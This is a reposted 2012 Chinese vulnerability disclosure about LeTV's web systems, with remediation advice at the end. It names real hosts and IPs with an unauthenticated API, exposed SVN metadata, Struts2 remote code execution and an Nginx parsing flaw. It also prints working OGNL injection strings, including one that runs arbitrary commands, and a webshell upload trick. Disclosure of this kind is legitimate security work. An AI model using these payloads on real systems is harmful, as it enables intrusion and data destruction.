来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 1,内部查询接口无验证且匿名开放http://123.126.33.234:8080/api/statistic/2,二处内部系统SVN泄露DNS管理系统http://123.126.33.236/pages/.svn/entries视频审核管理系统http://vas.letv.com/.svn/entries通过......
1,内部查询接口无验证且匿名开放
http://123.126.33.234:8080/api/statistic/ 2,二处内部系统SVN泄露 DNS管理系统 http://123.126.33.236/pages/.svn/entries 视频审核管理系统 http://vas.letv.com/.svn/entries 通过SVN遍历的时候发现tools下的大部分工具可直接操作,猜测应该可以向某文件发送post来删除视频 3,Struts2远程代码执行 http://bd.enp.letv.com/agents/list.action http://web.iptv.letv.com/iptv2/view/content_search3DJson.action http://app.iptv.letv.com/iptv2/view/searchPublicInfo.action同上 Poc www.2cto.com ?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.sleep(999999999)')(\u0023rt\u003d@java.lang.Thread@currentThread()))=1 Exp ?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('\u0023rt.exec(%22执行命令%22)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1 4,Nginx解析漏洞 乐视TV(hdtv.letv.com)用的是开源ecshop改的,同时该站点下提供了一个供用户讨论的Discuz! X2论坛,这也是导致攻击者上传图片通过解析漏洞直接拿到webshell,从而达到各种目的,亲,Google site:hdtv.letv.com/bbs/ 搜索一下你就明白了,估计也是你们知道有问题了才限制了上传文件夹的权限,建议针对这个小问题升级一下和排查一下后门 http://hdtv.letv.com/bbs/robots.txt/.php 修复方案:1,内部系统还是添加一下验证吧 2,对svn目录限制访问或删除 3,及时升级线上的struts2 4,升级Nginx或参考 www.2cto.com/Article/201007/51735.html 2012-3-31 作者 Z-0ne |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com